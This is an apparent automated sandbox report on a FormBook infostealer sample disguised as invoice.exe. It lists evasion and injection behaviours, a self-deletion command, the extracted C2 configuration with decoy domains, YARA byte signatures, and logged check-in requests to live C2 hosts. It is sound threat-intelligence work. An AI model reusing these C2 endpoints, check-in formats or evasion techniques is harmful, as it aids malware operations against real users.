Analysis Report invoice.exe

Overview

General Information

Sample Name: invoice.exe
Analysis ID: 383898
MD5: 492017e064cab97dd8ea27abd3e5cfca
SHA1: a3addbdea8245b2e16c6ef551755b9d0e66e8e2b
SHA256: 524306af2db603c7db95227603c3014b67c27cfb2f88d12de2a599ece24575e2
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • invoice.exe (PID: 1972 cmdline: 'C:\Users\user\Desktop\invoice.exe' MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
    • invoice.exe (PID: 480 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.invoice.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.invoice.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.invoice.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x158c9:$sqlite3step: 68 34 1C 7B E1
    • 0x159dc:$sqlite3step: 68 34 1C 7B E1
    • 0x158f8:$sqlite3text: 68 38 2A 90 C5
    • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
    • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.2.invoice.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.invoice.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: invoice.exe | Joe Sandbox ML: detected
Source: 3.2.invoice.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: invoice.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL | source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb | source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_02BF81C0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_02BF81B0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_02BF96E0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_02BF96D0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then pop esi | 3_2_0041584F
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop esi | 9_2_021C584F

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.sookepointcargo.com/e3rs/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.zmid.xyz
Source: global traffic | HTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1 | Host: www.flowhcf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1 | Host: www.jinlan.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.armaccountingbs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.knoxvilleoutdoorkitchens.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.highdeserthealthinsurance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1 | Host: www.hotelmaktub.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.legacyadmin.support | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | IP Address: 208.91.197.91
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: unknown | DNS traffic detected: queries for: www.flowhcf.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.16.1 | Date: Thu, 08 Apr 2021 10:04:37 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp, invoice.exe, 00000000.00000002.245138274.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmp | String found in binary or memory: http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: invoice.exe | String found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
Source: invoice.exe | String found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
Source: invoice.exe | String found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmp | String found in binary or memory: https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
